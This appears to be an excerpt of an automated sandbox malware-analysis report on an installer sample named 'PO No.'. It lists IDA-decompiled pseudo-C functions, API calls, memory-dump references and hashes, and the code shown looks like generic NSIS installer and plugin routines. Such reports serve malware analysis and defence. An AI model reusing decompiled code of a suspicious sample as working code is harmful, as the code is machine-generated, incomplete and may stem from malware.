                                                                      0x100024ff
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002506
                                                                      0x1000250c
                                                                      0x10002518
                                                                      0x1000251e
                                                                      0x10002523
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002545
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000252b
                                                                      0x10002531
                                                                      0x10002532
                                                                      0x10002534
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000254d
                                                                      0x1000254f
                                                                      0x10002551
                                                                      0x10002553
                                                                      0x10002553
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100024e8
                                                                      0x10002556
                                                                      0x10002556
                                                                      0x1000255b
                                                                      0x1000256d
                                                                      0x1000256d
                                                                      0x10002573
                                                                      0x10002578
                                                                      0x1000257d
                                                                      0x10002589
                                                                      0x1000258e
                                                                      0x00000000
                                                                      0x10002593
                                                                      0x1000257f
                                                                      0x10002580
                                                                      0x10002594
                                                                      0x10002594
                                                                      0x1000257d
                                                                      0x10002595
                                                                      0x10002599
                                                                      0x1000259c
                                                                      0x100025b3

                                                                      APIs
                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                      • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                      • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                      • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                      • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E004028A7(void* __ebx) {
                                                                      				void* _t26;
                                                                      				long _t31;
                                                                      				void* _t45;
                                                                      				void* _t49;
                                                                      				void* _t51;
                                                                      				void* _t54;
                                                                      				void* _t55;
                                                                      				void* _t56;
                                                                      
                                                                      				_t45 = __ebx;
                                                                      				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
                                                                      				_t50 = E00402C37(0xfffffff0);
                                                                      				 *(_t56 - 0x38) = _t23;
                                                                      				if(E00405CF8(_t50) == 0) {
                                                                      					E00402C37(0xffffffed);
                                                                      				}
                                                                      				E00405E7D(_t50);
                                                                      				_t26 = E00405EA2(_t50, 0x40000000, 2);
                                                                      				 *(_t56 + 8) = _t26;
                                                                      				if(_t26 != 0xffffffff) {
                                                                      					_t31 =  *0x42a258;
                                                                      					 *(_t56 - 0x3c) = _t31;
                                                                      					_t49 = GlobalAlloc(0x40, _t31);
                                                                      					if(_t49 != _t45) {
                                                                      						E00403441(_t45);
                                                                      						E0040342B(_t49,  *(_t56 - 0x3c));
                                                                      						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                      						 *(_t56 - 0x4c) = _t54;
                                                                      						if(_t54 != _t45) {
                                                                      							E004031BA(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                      							while( *_t54 != _t45) {
                                                                      								_t47 =  *_t54;
                                                                      								_t55 = _t54 + 8;
                                                                      								 *(_t56 - 0x34) =  *_t54;
                                                                      								E00405E5D( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                      								_t54 = _t55 +  *(_t56 - 0x34);
                                                                      							}
                                                                      							GlobalFree( *(_t56 - 0x4c));
                                                                      						}
                                                                      						E00405F54( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
                                                                      						GlobalFree(_t49);
                                                                      						 *((intOrPtr*)(_t56 - 0x30)) = E004031BA(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                      					}
                                                                      					CloseHandle( *(_t56 + 8));
                                                                      				}
                                                                      				_t51 = 0xfffffff3;
                                                                      				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
                                                                      					_t51 = 0xffffffef;
                                                                      					DeleteFileW( *(_t56 - 0x38));
                                                                      					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                      				}
                                                                      				_push(_t51);
                                                                      				E00401423();
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t56 - 4));
                                                                      				return 0;
                                                                      			}











                                                                      0x004028a7
                                                                      0x004028a9
                                                                      0x004028b5
                                                                      0x004028b8
                                                                      0x004028c2
                                                                      0x004028c6
                                                                      0x004028c6
                                                                      0x004028cc
                                                                      0x004028d9
                                                                      0x004028e1
                                                                      0x004028e4
                                                                      0x004028ea
                                                                      0x004028f8
                                                                      0x004028fd
                                                                      0x00402901
                                                                      0x00402904
                                                                      0x0040290d
                                                                      0x00402919
                                                                      0x0040291d
                                                                      0x00402920
                                                                      0x0040292a
                                                                      0x00402949
                                                                      0x00402931
                                                                      0x00402936
                                                                      0x0040293e
                                                                      0x00402941
                                                                      0x00402946
                                                                      0x00402946
                                                                      0x00402950
                                                                      0x00402950
                                                                      0x0040295d
                                                                      0x00402963
                                                                      0x00402975
                                                                      0x00402975
                                                                      0x0040297b
                                                                      0x0040297b
                                                                      0x00402986
                                                                      0x00402987
                                                                      0x0040298b
                                                                      0x0040298f
                                                                      0x00402995
                                                                      0x00402995
                                                                      0x0040299c
                                                                      0x00402245
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                      • GlobalFree.KERNEL32(?), ref: 00402950
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                      • Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
                                                                      • Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                      • Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00404BD0(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                      				char _v68;
                                                                      				char _v132;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t23;
                                                                      				signed int _t24;
                                                                      				void* _t31;
                                                                      				void* _t33;
                                                                      				void* _t34;
                                                                      				void* _t44;
                                                                      				signed int _t46;
                                                                      				signed int _t50;
                                                                      				signed int _t52;
                                                                      				signed int _t53;
                                                                      				signed int _t55;
                                                                      
                                                                      				_t23 = _a16;
                                                                      				_t53 = _a12;
                                                                      				_t44 = 0xffffffdc;
                                                                      				if(_t23 == 0) {
                                                                      					_push(0x14);
                                                                      					_pop(0);
                                                                      					_t24 = _t53;
                                                                      					if(_t53 < 0x100000) {
                                                                      						_push(0xa);
                                                                      						_pop(0);
                                                                      						_t44 = 0xffffffdd;
                                                                      					}
                                                                      					if(_t53 < 0x400) {
                                                                      						_t44 = 0xffffffde;
                                                                      					}
                                                                      					if(_t53 < 0xffff3333) {
                                                                      						_t52 = 0x14;
                                                                      						asm("cdq");
                                                                      						_t24 = 1 / _t52 + _t53;
                                                                      					}
                                                                      					_t25 = _t24 & 0x00ffffff;
                                                                      					_t55 = _t24 >> 0;
                                                                      					_t46 = 0xa;
                                                                      					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                      				} else {
                                                                      					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                      					_t50 = 0;
                                                                      				}
                                                                      				_t31 = E004063D2(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                      				_t33 = E004063D2(_t44, _t50, _t55,  &_v132, _t44);
                                                                      				_t34 = E004063D2(_t44, _t50, 0x423728, 0x423728, _a8);
                                                                      				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                      				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
                                                                      			}



















                                                                      0x00404bd9
                                                                      0x00404bde
                                                                      0x00404be6
                                                                      0x00404be7
                                                                      0x00404bf4
                                                                      0x00404bfc
                                                                      0x00404bfd
                                                                      0x00404bff
                                                                      0x00404c01
                                                                      0x00404c03
                                                                      0x00404c06
                                                                      0x00404c06
                                                                      0x00404c0d
                                                                      0x00404c13
                                                                      0x00404c13
                                                                      0x00404c1a
                                                                      0x00404c21
                                                                      0x00404c24
                                                                      0x00404c27
                                                                      0x00404c27
                                                                      0x00404c2b
                                                                      0x00404c3b
                                                                      0x00404c3d
                                                                      0x00404c40
                                                                      0x00404be9
                                                                      0x00404be9
                                                                      0x00404bf0
                                                                      0x00404bf0
                                                                      0x00404c48
                                                                      0x00404c53
                                                                      0x00404c69
                                                                      0x00404c7a
                                                                      0x00404c96

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                      • wsprintfW.USER32 ref: 00404C7A
                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s$(7B
                                                                      • API String ID: 3540041739-1320723960
                                                                      • Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                      • Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
                                                                      • Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                      • Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
                                                                      				signed int _t14;
                                                                      				int _t17;
                                                                      				int _t24;
                                                                      				signed int _t29;
                                                                      				intOrPtr* _t32;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      				void* _t38;
                                                                      				signed int _t40;
                                                                      
                                                                      				_t32 = __esi;
                                                                      				_t24 = __ebx;
                                                                      				_t14 =  *(_t35 - 0x20);
                                                                      				_t38 = __edx - 0x38;
                                                                      				 *(_t35 - 0x4c) = _t14;
                                                                      				_t27 = 0 | _t38 == 0x00000000;
                                                                      				_t29 = _t38 == 0;
                                                                      				if(_t14 == __ebx) {
                                                                      					if(__edx != 0x38) {
                                                                      						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
                                                                      					} else {
                                                                      						E00402C37(0x21);
                                                                      						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsh409.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsh409.tmp\System.dll", 0x400, __ebx, __ebx);
                                                                      						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsh409.tmp\System.dll");
                                                                      					}
                                                                      				} else {
                                                                      					E00402C15(1);
                                                                      					 *0x40add8 = __ax;
                                                                      					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
                                                                      				}
                                                                      				 *(_t35 + 8) = _t17;
                                                                      				if( *_t32 == _t24) {
                                                                      					L13:
                                                                      					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                      				} else {
                                                                      					_t34 = E00406310(_t27, _t32);
                                                                      					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405F83(_t34, _t34) >= 0) {
                                                                      						_t14 = E00405F54(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsh409.tmp\System.dll",  *(_t35 + 8));
                                                                      						_t40 = _t14;
                                                                      						if(_t40 == 0) {
                                                                      							goto L13;
                                                                      						}
                                                                      					} else {
                                                                      						goto L13;
                                                                      					}
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                      				return 0;
                                                                      			}












                                                                      0x00402592
                                                                      0x00402592
                                                                      0x00402592
                                                                      0x00402597
                                                                      0x0040259a
                                                                      0x0040259d
                                                                      0x004025a2
                                                                      0x004025a4
                                                                      0x004025c4
                                                                      0x00402602
                                                                      0x004025c6
                                                                      0x004025c8
                                                                      0x004025e2
                                                                      0x004025ed
                                                                      0x004025ed
                                                                      0x004025a6
                                                                      0x004025a8
                                                                      0x004025ad
                                                                      0x004025bb
                                                                      0x004025be
                                                                      0x00402607
                                                                      0x0040260a
                                                                      0x00402885
                                                                      0x00402885
                                                                      0x00402610
                                                                      0x00402619
                                                                      0x0040261b
                                                                      0x0040263a
                                                                      0x004015b4
                                                                      0x004015b6
                                                                      0x00000000
                                                                      0x004015bc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040261b
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsh409.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsh409.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsh409.tmp$C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll
                                                                      • API String ID: 3109718747-2430136213
                                                                      • Opcode ID: 45790e85744244df01fd5bd6f7748bdf35d3b634888f446f15f2e8743ffbd210
                                                                      • Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
                                                                      • Opcode Fuzzy Hash: 45790e85744244df01fd5bd6f7748bdf35d3b634888f446f15f2e8743ffbd210
                                                                      • Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E100022D0(void* __edx) {
                                                                      				void* _t37;
                                                                      				signed int _t38;
                                                                      				void* _t39;
                                                                      				void* _t41;
                                                                      				signed int* _t42;
                                                                      				signed int* _t51;
                                                                      				void* _t52;
                                                                      				void* _t54;
                                                                      
                                                                      				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                      				while(1) {
                                                                      					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                      					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                      					_t52 = _t51[6];
                                                                      					if(_t52 == 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					_t41 = 0x1a;
                                                                      					if(_t52 == _t41) {
                                                                      						goto L9;
                                                                      					}
                                                                      					if(_t52 != 0xffffffff) {
                                                                      						if(_t52 <= 0 || _t52 > 0x19) {
                                                                      							_t51[6] = _t41;
                                                                      							goto L12;
                                                                      						} else {
                                                                      							_t37 = E100012BA(_t52 - 1);
                                                                      							L10:
                                                                      							goto L11;
                                                                      						}
                                                                      					} else {
                                                                      						_t37 = E10001243();
                                                                      						L11:
                                                                      						_t52 = _t37;
                                                                      						L12:
                                                                      						_t13 =  &(_t51[2]); // 0x1020
                                                                      						_t42 = _t13;
                                                                      						if(_t51[1] != 0xffffffff) {
                                                                      						}
                                                                      						_t38 =  *_t51;
                                                                      						_t51[7] = 0;
                                                                      						if(_t38 > 7) {
                                                                      							L27:
                                                                      							_t39 = GlobalFree(_t52);
                                                                      							if( *(_t54 + 0x10) == 0) {
                                                                      								return _t39;
                                                                      							}
                                                                      							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                      							} else {
                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                      							}
                                                                      							continue;
                                                                      						} else {
                                                                      							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
                                                                      								case 0:
                                                                      									 *_t42 = 0;
                                                                      									goto L27;
                                                                      								case 1:
                                                                      									__eax = E10001311(__ebp);
                                                                      									goto L21;
                                                                      								case 2:
                                                                      									 *__edi = E10001311(__ebp);
                                                                      									__edi[1] = __edx;
                                                                      									goto L27;
                                                                      								case 3:
                                                                      									__eax = GlobalAlloc(0x40,  *0x1000406c);
                                                                      									 *(__esi + 0x1c) = __eax;
                                                                      									__edx = 0;
                                                                      									 *__edi = __eax;
                                                                      									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
                                                                      									goto L27;
                                                                      								case 4:
                                                                      									__eax = E1000122C(__ebp);
                                                                      									 *(__esi + 0x1c) = __eax;
                                                                      									L21:
                                                                      									 *__edi = __eax;
                                                                      									goto L27;
                                                                      								case 5:
                                                                      									__eax = GlobalAlloc(0x40, 0x10);
                                                                      									_push(__eax);
                                                                      									 *(__esi + 0x1c) = __eax;
                                                                      									_push(__ebp);
                                                                      									 *__edi = __eax;
                                                                      									__imp__CLSIDFromString();
                                                                      									goto L27;
                                                                      								case 6:
                                                                      									if( *__ebp != __cx) {
                                                                      										__eax = E10001311(__ebp);
                                                                      										 *__ebx = __eax;
                                                                      									}
                                                                      									goto L27;
                                                                      								case 7:
                                                                      									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                      									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                      									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                      									asm("cdq");
                                                                      									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
                                                                      									goto L27;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L9:
                                                                      					_t37 = E1000122C(0x10004044);
                                                                      					goto L10;
                                                                      				}
                                                                      			}











                                                                      0x100022e4
                                                                      0x100022e8
                                                                      0x100022f3
                                                                      0x100022f3
                                                                      0x100022fa
                                                                      0x100022ff
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002303
                                                                      0x10002306
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000230b
                                                                      0x10002316
                                                                      0x10002326
                                                                      0x00000000
                                                                      0x1000231d
                                                                      0x1000231f
                                                                      0x10002335
                                                                      0x00000000
                                                                      0x10002335
                                                                      0x1000230d
                                                                      0x1000230d
                                                                      0x10002336
                                                                      0x10002336
                                                                      0x10002338
                                                                      0x1000233c
                                                                      0x1000233c
                                                                      0x1000233f
                                                                      0x1000233f
                                                                      0x10002347
                                                                      0x1000234e
                                                                      0x10002351
                                                                      0x10002410
                                                                      0x10002411
                                                                      0x1000241c
                                                                      0x10002446
                                                                      0x10002446
                                                                      0x1000242c
                                                                      0x10002438
                                                                      0x1000242e
                                                                      0x1000242e
                                                                      0x1000242e
                                                                      0x00000000
                                                                      0x10002357
                                                                      0x10002357
                                                                      0x00000000
                                                                      0x1000235e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002366
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002374
                                                                      0x10002376
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002397
                                                                      0x1000239d
                                                                      0x100023a0
                                                                      0x100023a2
                                                                      0x100023b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000237f
                                                                      0x10002384
                                                                      0x10002387
                                                                      0x10002388
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100023be
                                                                      0x100023c4
                                                                      0x100023c5
                                                                      0x100023c8
                                                                      0x100023c9
                                                                      0x100023cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100023d7
                                                                      0x100023da
                                                                      0x100023e6
                                                                      0x100023e8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100023f4
                                                                      0x10002400
                                                                      0x10002403
                                                                      0x10002405
                                                                      0x10002408
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002357
                                                                      0x10002351
                                                                      0x1000232b
                                                                      0x10002330
                                                                      0x00000000
                                                                      0x10002330

                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 4216380887-0
                                                                      • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                      • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                      • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                      • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
                                                                      				_Unknown_base(*)()* _t7;
                                                                      				void* _t10;
                                                                      				int _t14;
                                                                      
                                                                      				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                      				_t10 = GlobalAlloc(0x40, _t14);
                                                                      				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                      				_t7 = GetProcAddress(_a4, _t10);
                                                                      				GlobalFree(_t10);
                                                                      				return _t7;
                                                                      			}






                                                                      0x10001619
                                                                      0x10001625
                                                                      0x10001632
                                                                      0x10001639
                                                                      0x10001642
                                                                      0x1000164e

                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10001617
                                                                      • GlobalAlloc.KERNEL32(00000040,00000000), ref: 1000161E
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10001632
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 10001639
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                      • String ID:
                                                                      • API String ID: 1148316912-0
                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
